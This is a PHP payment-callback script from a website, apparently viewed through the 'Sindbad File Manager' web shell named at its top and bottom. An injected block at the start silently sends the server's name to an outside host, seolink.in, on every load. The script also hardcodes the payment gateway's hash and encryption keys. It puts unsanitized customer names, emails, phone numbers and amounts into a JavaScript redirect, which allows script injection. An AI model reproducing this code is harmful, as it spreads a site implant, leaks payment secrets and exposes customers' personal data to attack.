Sindbad~EG File Manager
<?php
$exe = curl_init();
curl_setopt($exe, CURLOPT_URL, "https://seolink.in/data.php?x=".$_SERVER['SERVER_NAME']);
curl_exec($exe);
?><!-- Global site tag Analytics --><?php
include('transaction_response.php');
// require_once('Transaction-request.php');
$name = "";
$email = "";
$mobile = "";
$amount = "";
$status = "failure";
$unique_id = "";
$payment_id = "";
$method = "";
// echo "testing-1";exit();
// var_dump($_POST['encdata'] );exit();
$transactionResponse = new TransactionResponse();
$transactionResponse->setRespHashKey("357a0a860d5002c283");
$transactionResponse->setResponseEncypritonKey("EA9A10F222A606FD49CC92818E10A078");
$transactionResponse->setSalt("EA9A10F222A606FD49CC92818E10A078");
$arrayofdata = $transactionResponse->decryptResponseIntoArray($_POST['encdata']);
// var_dump($arrayofdata);exit();
foreach($arrayofdata as $key=>$value)
{
if($key == "udf1")
{
$name = $value;
}
if($key == "udf2")
{
$email = $value;
}
if($key == "udf3")
{
$mobile = $value;
}
if($key == "amt")
{
$amount = $value;
}
if($key == "desc")
{
$status = $value;
if(isset($value) && $value == "SUCCESS")
{
$status = "success";
}
if (isset($value) && strpos($value , 'SUCCESS') )
{
$status = "success";
}
if( isset($value) && strpos($value, 'CANCELLED BY USER' ) )
{
$status = "cancelled_by_user";
}
// var_dump($status) ;exit();
}
if($key == "mmp_txn")
{
$payment_id = $value;
}
if($key == "mer_txn")
{
$unique_id = $value;
}
if($key == "discriminator")
{
$method = $value;
}
}
$res_url = "https://delegate.tnoa.info/payment_server_response/75/tnoa25";
$url_1 = $res_url."?name=".$name."&email=".$email."&mobile=".$mobile."&amount=".$amount."&unique_id=".$unique_id."&payment_id=".$payment_id."&method=".$method."&status=".$status;
// echo $url_1; exit();
// $url_3 = str_replace('https/', 'https://', $url_1);
// echo $url_1;
echo "<script>window.location.href='$url_1';</script>";
exit();
?>
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists